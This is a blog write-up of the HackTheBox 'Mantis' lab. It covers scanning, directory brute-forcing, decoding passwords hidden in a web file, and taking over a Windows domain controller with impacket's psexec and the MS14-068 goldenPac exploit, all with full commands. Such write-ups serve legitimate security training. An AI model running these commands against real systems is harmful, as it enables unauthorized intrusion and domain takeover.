root@V3dedBlog:~#
CTF

HackTheBox - Mantis writeup

Introduction

It has been a long time since my last blog for sure! Close to 4 months! Well, time to change that, I guess. This blog will describe steps needed to pwn the Mantis machine from HackTheBox labs. Hope you enjoy!


Scanning & Enum

Start out by obtaining the IP (10.10.10.52) of the Mantis machine and nmap it:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
root@EdgeOfNight:~/Desktop/Writeups/Mantis/Scans# nmap -A -sS --script vuln -T4 10.10.10.52 

Starting Nmap 7.50 ( https://nmap.org ) at 2018-02-24 08:31 CST
Pre-scan script results:
| broadcast-avahi-dos: 
|   Discovered hosts:
|     224.0.0.251
|   After NULL UDP avahi packet DoS (CVE-2011-1002).
|_  Hosts are all up (not vulnerable).
Nmap scan report for 10.10.10.52
Host is up (0.040s latency).
Not shown: 979 closed ports
PORT      STATE SERVICE      VERSION
53/tcp    open  domain       Microsoft DNS 6.1.7601
88/tcp    open  kerberos-sec Microsoft Windows Kerberos (server time: 2018-02-24 14:32:47Z)
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
389/tcp   open  ldap         Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
|_sslv2-drown: 
445/tcp   open  microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds (workgroup: HTB)
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
1337/tcp filtered waste
|_sslv2-drown: 
1433/tcp  open  ms-sql-s     Microsoft SQL Server 2014 12.00.2000
| ssl-poodle: 
|   VULNERABLE:
|   SSL POODLE information leak
|     State: VULNERABLE
|     IDs:  CVE:CVE-2014-3566  OSVDB:113251
|           The SSL protocol 3.0, as used in OpenSSL through 1.0.1i and other
|           products, uses nondeterministic CBC padding, which makes it easier
|           for man-in-the-middle attackers to obtain cleartext data via a
|           padding-oracle attack, aka the "POODLE" issue.
|     Disclosure date: 2014-10-14
|     Check results:
|       TLS_RSA_WITH_3DES_EDE_CBC_SHA
|     References:
|       https://www.openssl.org/~bodo/ssl-poodle.pdf
|       https://www.imperialviolet.org/2014/10/14/poodle.html
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3566
|_      http://osvdb.org/113251
|_sslv2-drown: 
|_tls-ticketbleed: ERROR: Script execution failed (use -d to debug)
3268/tcp  open  ldap         Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
|_sslv2-drown: 
3269/tcp  open  tcpwrapped
|_ssl-ccs-injection: No reply from server (TIMEOUT)
|_sslv2-drown: 
8080/tcp  open  http         Microsoft IIS httpd 7.5
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-server-header: Microsoft-IIS/7.5
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
49152/tcp open  msrpc        Microsoft Windows RPC
49153/tcp open  msrpc        Microsoft Windows RPC
49154/tcp open  msrpc        Microsoft Windows RPC
49155/tcp open  msrpc        Microsoft Windows RPC
49157/tcp open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
49158/tcp open  msrpc        Microsoft Windows RPC
49165/tcp open  msrpc        Microsoft Windows RPC
49167/tcp open  msrpc        Microsoft Windows RPC
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.50%E=4%D=2/24%OT=53%CT=1%CU=42325%PV=Y%DS=2%DC=T%G=Y%TM=5A917AB
OS:6%P=x86_64-pc-linux-gnu)SEQ(SP=104%GCD=1%ISR=10C%CI=I%TS=7)OPS(O1=M54DNW
OS:8ST11%O2=M54DNW8ST11%O3=M54DNW8NNT11%O4=M54DNW8ST11%O5=M54DNW8ST11%O6=M5
OS:4DST11)WIN(W1=2000%W2=2000%W3=2000%W4=2000%W5=2000%W6=2000)ECN(R=Y%DF=Y%
OS:T=80%W=2000%O=M54DNW8NNS%CC=N%Q=)T1(R=Y%DF=Y%T=80%S=O%A=S+%F=AS%RD=0%Q=)
OS:T2(R=Y%DF=Y%T=80%W=0%S=Z%A=S%F=AR%O=%RD=0%Q=)T3(R=Y%DF=Y%T=80%W=0%S=Z%A=
OS:O%F=AR%O=%RD=0%Q=)T4(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T5(R=Y%DF=
OS:Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%
OS:RD=0%Q=)T7(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=80%I
OS:PL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=80%CD=Z)

Network Distance: 2 hops
Service Info: Host: MANTIS; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: NT_STATUS_ACCESS_DENIED

TRACEROUTE (using port 1720/tcp)
HOP RTT      ADDRESS
1   35.44 ms 10.10.14.1
2   33.17 ms 10.10.10.52

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 872.47 seconds

Tip: You can use “–script vuln” to try and run every “vuln” testing script in nmap. It’s very loud though so I’d advise not to use it if your main goal is to stay hidden.”

Right from the bat we can see multiple interesting services - Kerberos(88), LDAP(389), MSSQL(1433), IIS(8080) and ?Wasted (1337)?. Let’s go through some of them.

- Wasted (port: 1337)

This port immediately grabbed my attention! It’s sort of an infosec pun one could say :). Upon accessing the port we are presented with a web server:

Usual scans like nikto didn’t yield much. Time to brute the directories:

1
2
3
4
5
6
7
8
9
10
11
12
root@EdgeOfNight:~/Desktop/Writeups/Mantis/Scans# gobuster -u http://10.10.10.52:8080 -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -t 25 -e

Gobuster v1.2                OJ Reeves (@TheColonial)
=====================================================
[+] Mode         : dir
[+] Url/Domain   : http://10.10.10.52:1337/
[+] Threads      : 25
[+] Wordlist     : /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes : 200,204,301,302,307
[+] Expanded     : true
=====================================================
http://10.10.10.52:8080/secure_notes (Status: 200)

Secure_notes is a directory with listing enabled. Its content can be found in the image below:

Unfortunately web.config doesn’t lead anywhere, it’s just an empty page. However dev_notes do:

Notice two alerting things:

  1. The actual filename - dev_notes_NmQyNDI0Nz…I2NDIx.txt.txt
  2. The scrollbar on the right indicates we can still go down and view possible hidden content.

Regarding point 1 - the filename looks suspicious. 2 file extensions and “random” gibberish as the name. If you look closely though, you can spot that the name is base64 encoded. Proceed to decode it:

1
2
root@EdgeOfNight:~# echo NmQyNDI0NzE2YzVmNTM0MDVmNTA0MDczNzM1NzMwNzI2NDIx | base64 -d
6d2424716c5f53405f504073735730726421`

That looks familiar as well, doesn’t it? It’s hex! Aaaand it decodes to m$$ql_S@_P@ssW0rd!. Wonderful! Onto the second point now. Simply scroll down the webpage.

1
2
3
Credentials stored in secure format
OrchardCMS admin creadentials 010000000110010001101101001000010110111001011111010100000100000001110011011100110101011100110000011100100110010000100001
SQL Server sa credentials file namez

Secure format? Binary? These two don’t go together. By decoding the binary string above we are present with another password: @dm!n_P@ssW0rd!.

So far we have gathered two passwords:

Let’s save them and continue enumeration of other services.

- IIS (port: 8080)

Accessing port 8080 we get this webpage:
OrchardCMS… Interesting. If you recall correctly, we discovered login credentials in the previous section. Let’s try and find the administrator page.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
root@EdgeOfNight:~/Desktop/Writeups/Mantis/Scans# gobuster -u http://10.10.10.52:8080 -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -t 25 -e

Gobuster v1.2                OJ Reeves (@TheColonial)
=====================================================
[+] Mode         : dir
[+] Url/Domain   : http://10.10.10.52:8080/
[+] Threads      : 25
[+] Wordlist     : /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
[+] Status codes : 200,204,301,302,307
[+] Expanded     : true
=====================================================
http://10.10.10.52:8080/archive (Status: 200)
http://10.10.10.52:8080/blogs (Status: 200)
http://10.10.10.52:8080/admin (Status: 302)
http://10.10.10.52:8080/tags (Status: 200)
http://10.10.10.52:8080/Archive (Status: 200)
http://10.10.10.52:8080/pollArchive (Status: 200)

http://10.10.10.52:8080/admin (Status: 302) - use admin:@dm!n_P@ssW0rd! credentials to login.

Unfortunately I didn’t find any useful information on here. Might as well be a rabbit hole…

- MSSQL(port: 1433)

This one is really simple. Just use the previously discovered credentials and snoop through the database tables! I used DBeaver for this purpose.

DBeaver can be installed with apt: apt-get install dbeaver

Add a new connection:

Navigate through tables until you reach UserPartRecord (part of orcharddb) and view the data:

A new username and a cleartext password!


Exploitation

2 main methods!

Instead of exploiting straight away you can use various tools like rpcclient or smbclient to gather some information. Trying to keep the blog short though, so let’s skip that.

- Psexec

I didn’t notice this attack vector in my first attempt, BUT kudos to ippsec for showing this method in his video! I highly advise you check his channel out. This command will use psexec and successfully exploit the machine:

1
/usr/share/doc/python-impacket/examples/psexec.py htb.local/james@10.10.10.52

- Kerberos: MS14-068

For the sake of keeping this blog post short I won’t describe the “science” behind this vulnerability. It’s rather complex. Check the links below if you are interested in the actual explanation.

For exploiting this particular vulnerability we can use impacket github repo & its goldenPac.py exploit. Install it:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
root@EdgeOfNight:~/Documents/Github# git clone https://github.com/CoreSecurity/impacket && cd impacket && pip install .
Cloning into 'impacket'...
remote: Counting objects: 12730, done.
remote: Compressing objects: 100% (32/32), done.
remote: Total 12730 (delta 12), reused 19 (delta 6), pack-reused 12692
Receiving objects: 100% (12730/12730), 4.28 MiB | 1.06 MiB/s, done.
Resolving deltas: 100% (9620/9620), done.
Collecting ldap3==2.2.3 (from -r requirements.txt (line 1))
  Downloading ldap3-2.2.3-py2.py3-none-any.whl (365kB)
    100% |████████████████████████████████| 368kB 1.1MB/s 
Collecting pyasn1>=0.2.3 (from -r requirements.txt (line 2))
  Downloading pyasn1-0.4.2-py2.py3-none-any.whl (71kB)
    100% |████████████████████████████████| 71kB 968kB/s 
Requirement already satisfied: pycrypto>=2.6.1 in /usr/lib/python2.7/dist-packages (from -r requirements.txt (line 3))
Requirement already satisfied: pyOpenSSL>=0.13.1 in /usr/lib/python2.7/dist-packages (from -r requirements.txt (line 4))
Installing collected packages: pyasn1, ldap3
  Found existing installation: pyasn1 0.1.9
    Not uninstalling pyasn1 at /usr/lib/python2.7/dist-packages, outside environment /usr
Successfully installed ldap3-2.2.3 pyasn1-0.4.2
Installing collected packages: impacket
  Found existing installation: impacket 0.9.15
    Not uninstalling impacket at /usr/lib/python2.7/dist-packages, outside environment /usr
  Running setup.py install for impacket ... done
Successfully installed impacket-0.9.16.dev0

Now run the exploit.

1
root@EdgeOfNight:~/Documents/Github/impacket/examples# python goldenPac.py -dc-ip 10.10.10.52 -target-ip 10.10.10.52 htb.local/james@mantis.htb.local

Congratulations!


Conclusion

An amazing box! Would rate it as one of the better ones for sure. I’ve definitely learnt a lot while working on this masterpiece. To conclude, I’d love to thank bitvijays for helping me when I got stuck on the goldenPac part.

~V3